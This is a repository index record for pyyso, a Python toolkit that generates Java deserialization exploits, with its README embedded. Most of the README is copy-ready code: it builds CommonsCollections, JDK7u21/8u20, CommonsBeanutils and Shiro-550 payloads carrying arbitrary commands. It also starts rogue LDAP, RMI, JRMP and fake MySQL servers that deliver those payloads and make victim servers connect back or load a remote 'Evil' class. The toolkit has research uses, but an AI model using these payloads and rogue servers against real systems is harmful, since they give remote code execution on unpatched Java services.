{"id":22177054,"url":"https://github.com/cokebeer/pyyso","last_synced_at":"2025-10-23T18:53:44.869Z","repository":{"id":40334821,"uuid":"471416660","full_name":"cokeBeer/pyyso","owner":"cokeBeer","description":"pyyso is a Python package that generate java serialized poc. Including CommonsCollections1-7, JDK7u21, JDK8u20, ldap for jndi, shiro-550, CommonsBeanutils1 no cc, JRMPClient, high version JDK Bypass, Fake MySQL for JDBC attack","archived":false,"fork":false,"pushed_at":"2022-11-05T12:21:22.000Z","size":40,"stargazers_count":52,"open_issues_count":1,"forks_count":4,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-09-21T12:54:20.411Z","etag":null,"topics":["exploit","gadget","java","jdbc","jdk7u21","jdk8u20","jndi","jrmp","ldap","mysql","poc","python","rmi","serialization","shiro"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cokeBeer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-03-18T15:16:11.000Z","updated_at":"2025-08-29T16:33:22.000Z","dependencies_parsed_at":"2023-01-21T22:47:40.869Z","dependency_job_id":null,"html_url":"https://github.com/cokeBeer/pyyso","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/cokeBeer/pyyso","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Fpyyso","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Fpyyso/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Fpyyso/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Fpyyso/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cokeBeer","download_url":"https://codeload.github.com/cokeBeer/pyyso/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cokeBeer%2Fpyyso/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279011445,"owners_count":26084947,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-12T02:00:06.719Z","response_time":53,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","gadget","java","jdbc","jdk7u21","jdk8u20","jndi","jrmp","ldap","mysql","poc","python","rmi","serialization","shiro"],"created_at":"2024-12-02T08:25:11.629Z","updated_at":"2025-10-12T13:35:36.984Z","avatar_url":"https://github.com/cokeBeer.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# pyyso: powerful java serialized toolkit\n\n## What is it?\n**pyyso** is a Python package that provides fast and flexible ways to generate java serialized poc.\nIt aims to be the fundamental high-level building block for doing vulnerability **check and research** in Python.\nAdditionally, it has a goal of becoming the most convenient and reliable toolkit implemented in Python for Java researchers\n\n## Main Features\nHere are just a few of the things that pyyso does well:\n\n- Easy generating of java serialized poc\n- Powerful, flexible functionality to start a LDAP/RMI/JRMP/MySQL server to host java serialized pocs\n- Communicating and collaborating with other Python packages \n- Won't be exploited back in RMI like java client\n\npyyso has implemented\n- URLDNS Gadget\n- CommonsCollections1-7 Gadgets\n- JDK7u21 Gadget\n- JDK8u21 Gadget\n- CommonsBeanutils1 1.8.3 no cc\n- CommonsBeanutils1 1.9.2\n- shiro-550 rememberMe deserialized\n- java class embed with command\n- LDAP server hosting java serialized pocs\n- LDAP server hosting java remote reference factory\n- RMI server\n- high JDK version beanfactory bypass\n- JRMP server\n- JRMPClient Gadget\n- Fake MySQL server for JDBC deserialize\n\n## Where to get it\nThe source code is currently host on GitHub at:\nhttps://github.com/cokeBeer/pyyso\n\n## Installation from sources\n```sh\npip install pyyso\n```\n\n## How to use\n### basic usage\n\nFirst import pyyso\n\n```python\nimport pyyso\n```\nTo generate a java serialized zed poc use:\n```python\npyyso.urldns(\"https://x.dnslog.com\") #return java serialzed data of URLDNS in bytes\npyyso.cc1(\"touch /tmp/1\") #return java serialzed data of CommonsColletions1 in bytes\npyyso.cc2(\"touch /tmp/1\") #return java serialzed data of CommonsColletions2 in bytes\npyyso.jdk7u21(\"touch /tmp/1\") #return java serialzed data of JDK7u21 in bytes\npyyso.jdk8u20(\"touch /tmp/1\") #return java serialzed data of JDK8u20 in bytes\npyyso.jrmpclient(\"127.0.0.1\",80) #return java serialzed data of jrmpclient in bytes\npyyso.cb1v183(\"touch /tmp/1\") #return java serialzed data of CommonsBeanutils1 1.8.3 no cc in bytes\n```\nTo generate a java class embed with command use:\n```python\npyyso.clazz(\"touch /tmp/1\") #return java class embed with command in bytes\n```\n### shiro \n\nTo encode a shiro poc use:\n\n```python\nserobj=pyyso.cb1v183(\"touch /tmp/1\")\npyyso.shiroEncode(serobj=serobj,key=b'kPH+bIxk5D2deZiIxcaaaA==')\n```\n### LDAP\n\nTo start a LDAP server hosting java serialized pocs:\n\n```python\nserobj=pyyso.cc1(\"touch /tmp/1\")\nserver=pyyso.LdapSerialized(serobj=serobj, ip=\"0.0.0.0\", port=1389)\nserver.run()\n```\nThis will start a LDAP server listening `0.0.0.0:1389` \nYou can change the hosted java serialized data by:\n\n```python\nserver.serobj=pyyso.cc1(\"rm /tmp/2\")\n```\nTo start a LDAP server hosting java remote reference factory:\n```python\nserver=pyyso.LdapRemoteRef(javaCodeBase=\"http://127.0.0.1:8088/\", javaFactory=\"Evil\", javaClassName=\"java.lang.String\", ip=\"0.0.0.0\", port=1389):\nserver.run()\n```\nThis will start a LDAP server listening `0.0.0.0:1389 ` \nand will return a remote reference point to `http://127.0.0.1:8088/Evil.class`\n\n### JRMP\n\nTo start a JRMPListener\n\n```python\nserobj=pyyso.cc1(\"open /tmp\",jrmp=True) #note that there is 'jrmp=True'!\nserver=pyyso.JRMPListener(serobj=,ip=\"0.0.0.0\", port=5151)\nserver.run()\n```\n\nThis will start a JRMPListener listening `0.0.0.0:5151`\n\nBy deserializing a jrmpclient Gadget in victim's server, the victim's server will connect back to JRMPListener.\n\nthe  jrmpclient Gadget should be made by:\n\n```python\nserobj=pyyso.jrmpclient(hostname=\"127.0.0.1\", port=5151)\n```\n\nwhich the hostname  is corresponding to where JRMPListener is hosting on\n\n### RMI and bypass\n\nTo get a bypass poc, use:\n\n```python\nserobj=pyyso.beanfactory(\"open /tmp\", rmi=True)\n```\n\nTo start a RMI server and host bypass poc, use:\n\n```python\nserobj=pyyso.beanfactory(\"open /\",rmi=True) ##note that there is 'rmi=True'!\nserver=pyyso.RMIServer(serobj=serobj,ip=\"0.0.0.0\", port=1099, refip=\"0.0.0.0\", refport=42155)\nserver.run()\n```\n\na registry will listen `0.0.0.0:1099`  and a poc provider server will listen `0.0.0.0:42155`\n\n### MySQL\n\nto start a MySQL server hosts JDBC deserialize payload, use:\n```python\nserobj=pyyso.cc2(\"open /\")\nserver=pyyso.MysqlServer(serobj=serobj, ip=\"0.0.0.0\", port=3306)\nserver.run()\n```\n\na fake MySQL server will listen `0.0.0.0:3306`, and wait for `SHOW STATUS`\n\n## Support Options\n\nFor some reasons, part Gadgets support  JRMP or RMI now，which can be enabled by `rmi=True` or `jrmp=True`\n\n| Gadgets     | Basic | jrmp option | rmi option |\n| ----------- | ----- | ----------- | ---------- |\n| CC1-CC7     | ✅     | ✅           | ❌          |\n| CB1v192     | ✅     | ✅           | ❌          |\n| CB1v183     | ✅     | ✅           | ❌          |\n| JDK7u21     | ✅     | ✅           | ❌          |\n| beanfactory | ❌     | ❌           | ✅          |\n| others      | ✅     | ❌           | ❌          |\n\n## License\n\n[MIT](LICENSE)\n\n## Inspired by\nhttps://github.com/frohoff/ysoserial  \nhttps://github.com/mbechler/marshalsec\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcokebeer%2Fpyyso","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcokebeer%2Fpyyso","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcokebeer%2Fpyyso/lists"}